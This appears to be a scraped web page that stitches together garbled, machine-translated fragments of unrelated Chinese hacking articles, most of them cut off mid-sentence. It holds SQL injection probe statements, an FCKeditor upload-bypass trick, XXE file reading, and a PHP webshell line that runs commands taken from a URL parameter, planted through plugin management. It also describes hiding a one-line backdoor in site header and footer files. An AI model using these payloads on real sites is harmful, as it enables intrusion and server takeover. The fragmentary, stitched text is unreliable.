Ark' moon (dark moon)
Tem: www.90sec.org
Blog: blog.moonhack.com
XSS, also known as CSS (Cross Site Script), is a Cross-Site scripting attack. A malicious attacker inserts malicious html code into a Web page. When a user browses this page, the
I. Basics
To guess the table name, use the statement of "ah d" here:
And exists (select * from table name)
Name of the name to be guessed:
And exists (select field from table name)
The UNION method. We recommend that you perform order by before
Author: hackdn
Baidu hasn't found it. Just try again.
FCKEDITOR Upload Vulnerability: fck/editor/filemanager/connectors/test.html
Upload. asa; jpg
If there is no TEST. HTML, save the following EXP. Fill in the URL by yourself
*
By thanks
Imagine that you are a hacker, and we use spring mvc + velocity to build a system. Even if the door is open to allow jsp uploads, can you use shell?
We know that the conditions that webshell can run are nothing more than 1. It can
/** Author: cfking* Team: 90sec.org*/
I have read an article about entity injection of 80sec: www.2cto.com/Article/201111/109868.html.
First, I created an XML file.]>& Hi80sec;File: // C:/wamp/www/2.php This is the file in my local directory.
Brief description:
When you submit a numeric value, you can submit abnormal information (negative ).
Detailed description:
When you select to initiate a reward vote, you can enter a negative number and submit
After the vote is successfully
Brief description:
There are reflected XSS vulnerabilities in Sina music library's music topic search function and followed person search function
Detailed description:
Vulnerability POC connection:
Http://music.sina.com.cn/shequ/mu_center/
In the background, enter plug-in management. Add plug-in.
Ajax_complete:
If (isset ($ _ GET ['cmd']) {echo " cmd "; system ($ _ GET ['cmd']); exit ;}
Activate mod
Access: www.2cto.com/forumlocation/ajax. php? Cmd = command
For example:
Team: t00ls Author: Cond0rOpen a code file and you will find it ..View code... Omitting code .........Public function index (){// Read and judge the database$ Type = M ('type ');$ List = $ type-> where ('typeid = '. $ _ GET ['typeid'])-> field
1 plus Salt hash
2 Code related to password hashes in ASP. NET 2.0 Membership
Disclaimer: The Source Code listed in this article is taken from the. NET Framework class library through Reflector. The reference code is only for the purpose of
I circled a forum in a black broad forum and found the xml read Arbitrary File Vulnerability.As a result, I suddenly think of the xmlgetshell of dz, which is a little dangerous. So I will release it here.With php + xml, any file can be read as
Brief description: Zhongguancun online user registration email verification has serious logical defects, leading to email verification failure
Zhongguancun online user registration, need to send an activation link containing encrypted strings to
Title:
======
SpamTitan v5.08-Multiple Web Vulnerabilities
Program Overview
==================
SpamTitan Anti Spam is a complete software solution to email security offering protection from Spam, Viruses, Trojans, Phishing
And unwanted content.
Brief description: The phpdisk system is widely used. This parsing vulnerability is a little tricky. The phpdisk version is not a killer.
Detailed Description: A parsing vulnerability recently discovered on an online storage site. The phpdisk
As we all know, wordpress System Default background login interface address for domain name/wp-login.php directly expose the background to visitors with ulterior motives is very insecure. Because there are too many brute force tools, you may be
I haven't played the audit for a long time, so I downloaded the source code and found an xss to play ....!!!Vulnerability Type: Persistent xssStore xss in the RegistryCode:
rs("username")=trim(request("username"))rs("userpassword")=md5(trim(request("
Use a function in php to automatically add the header and footer to the file to hide a sentence.
Edit the php script file in a directory of the site (such as the root directory) named info. php. The content is as follows:Phpinfo ();?>Open http: // 1
CVE-2013-1966 description:
The and tags of Apache Struts2 both provide the includeParams attribute. Values allowed for this attribute include none, get, and all. When this attribute is set to get or all, Apache Struts2 executes the parameter value
PHP is one of the most popular dynamic website development scripting languages in the Internet environment. The security of Web applications developed using PHP is also the focus of hackers. This article analyzes and describes the security of Web
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.